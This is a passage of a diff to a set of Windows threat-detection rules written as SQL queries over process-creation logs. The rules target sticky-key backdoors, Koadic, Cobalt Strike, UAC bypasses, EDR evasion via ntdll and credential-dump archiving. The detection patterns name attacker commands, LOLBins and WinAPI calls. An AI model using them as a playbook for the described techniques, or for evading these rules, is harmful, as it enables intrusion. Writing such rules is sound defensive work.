"ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%curl%' ESCAPE '\\' OR CommandLine LIKE '%ipconfig%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AccCheckConsole.exe' ESCAPE '\\' OR OriginalFileName = 'AccCheckConsole.exe') AND (CommandLine LIKE '% -window %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_26084_atlassian_confluence.yml" + "filename": "proc_creation_win_lolbin_susp_acccheckconsole.yml" }, { - "title": "Potential WinAPI Calls Via CommandLine", - "id": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", + "title": "Winrar Compressing Dump Files", + "id": "1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc", "status": "experimental", - "description": "Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious winrar execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1106" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate use of WinRAR with a command line in which .dmp appears accidentally" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%AddSecurityPackage%' ESCAPE '\\' OR CommandLine LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR CommandLine LIKE '%Advapi32%' ESCAPE '\\' OR CommandLine LIKE '%CloseHandle%' ESCAPE '\\' OR CommandLine LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR CommandLine LIKE '%CreatePseudoConsole%' ESCAPE '\\' OR CommandLine LIKE '%CreateRemoteThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateThread%' ESCAPE '\\' OR CommandLine LIKE '%CreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%DangerousGetHandle%' ESCAPE '\\' OR CommandLine LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR CommandLine LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR CommandLine LIKE '%FreeHGlobal%' ESCAPE '\\' OR CommandLine LIKE '%FreeLibrary%' ESCAPE '\\' OR CommandLine LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR CommandLine LIKE '%GetLogonSessionData%' ESCAPE '\\' OR CommandLine LIKE '%GetModuleHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetProcAddress%' ESCAPE '\\' OR CommandLine LIKE '%GetProcessHandle%' ESCAPE '\\' OR CommandLine LIKE '%GetTokenInformation%' ESCAPE '\\' OR CommandLine LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR CommandLine LIKE '%kernel32%' ESCAPE '\\' OR CommandLine LIKE '%LoadLibrary%' ESCAPE '\\' OR CommandLine LIKE '%memcpy%' ESCAPE '\\' OR CommandLine LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR CommandLine LIKE '%ntdll%' ESCAPE '\\' OR CommandLine LIKE '%OpenDesktop%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcess%' ESCAPE '\\' OR CommandLine LIKE '%OpenProcessToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%OpenWindowStation%' ESCAPE '\\' OR CommandLine LIKE '%PtrToString%' ESCAPE '\\' OR CommandLine LIKE '%QueueUserApc%' ESCAPE '\\' OR CommandLine LIKE '%ReadProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR CommandLine LIKE '%secur32%' ESCAPE '\\' OR CommandLine LIKE '%SetThreadToken%' ESCAPE '\\' OR CommandLine LIKE '%VirtualAlloc%' ESCAPE '\\' OR CommandLine LIKE '%VirtualFree%' ESCAPE '\\' OR CommandLine LIKE '%VirtualProtect%' ESCAPE '\\' OR CommandLine LIKE '%WaitForSingleObject%' ESCAPE '\\' OR CommandLine LIKE '%WriteInt32%' ESCAPE '\\' OR CommandLine LIKE '%WriteProcessMemory%' ESCAPE '\\' OR CommandLine LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' AND CommandLine LIKE '%GetLoadLibraryWAddress32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rar.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_inline_win_api_access.yml" + "filename": "proc_creation_win_winrar_dmp.yml" }, { - "title": "UAC Bypass Using PkgMgr and DISM", - "id": "a743ceba-c771-4d75-97eb-8a90f7f4844c", + "title": "Suspicious IIS Module Registration", + "id": "043c4b8b-3a54-4780-9682-081cb6b8185c", "status": "test", - "description": "Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)", - "author": "Christian Burkard (Nextron Systems)", - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ], + "description": "Detects a suspicious IIS module registration as described in Microsoft threat report on IIS backdoors", + "author": "Florian Roth (Nextron Systems), Microsoft (idea)", "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\pkgmgr.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND (CommandLine LIKE '%appcmd.exe add module%' ESCAPE '\\' OR (CommandLine LIKE '% system.enterpriseservices.internal.publish%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\') OR (CommandLine LIKE '%gacutil%' ESCAPE '\\' AND CommandLine LIKE '% /I%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_pkgmgr_dism.yml" + "filename": "proc_creation_win_iis_susp_module_registration.yml" }, { - "title": "Suspicious Control Panel DLL Load", - "id": "d7eb979b-c2b5-4a6f-a3a7-c87ce6763819", - "status": "test", - "description": "Detects suspicious Rundll32 execution from control.exe as used by Equation Group and Exploit Kits", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost.exe CommandLine Path Traversal", + "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "status": "experimental", + "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\System32\\\\control.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE')) AND NOT (CommandLine LIKE '%Shell32.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_control_dll_load.yml" + "filename": "proc_creation_win_conhost_path_traversal.yml" }, { - "title": "PUA - AdFind Suspicious Execution", - "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "title": "CobaltStrike Load by Rundll32", + "id": "ae9c6a7c-9521-42a6-915e-5aaa8689d529", "status": "test", - "description": "Detects AdFind execution with common flags seen used during attacks", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", + "description": "Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.", + "author": "Wojciech Lesicki", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Legitimate admin activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' OR CommandLine LIKE '%rundll32 %' ESCAPE '\\')) AND (CommandLine LIKE '%.dll%' ESCAPE '\\' AND (CommandLine LIKE '% StartW' ESCAPE '\\' OR CommandLine LIKE '%,StartW' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_adfind_susp_usage.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", + "title": "DNS RCE CVE-2020-1350", + "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown but benign sub processes of the Windows DNS service dns.exe" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM 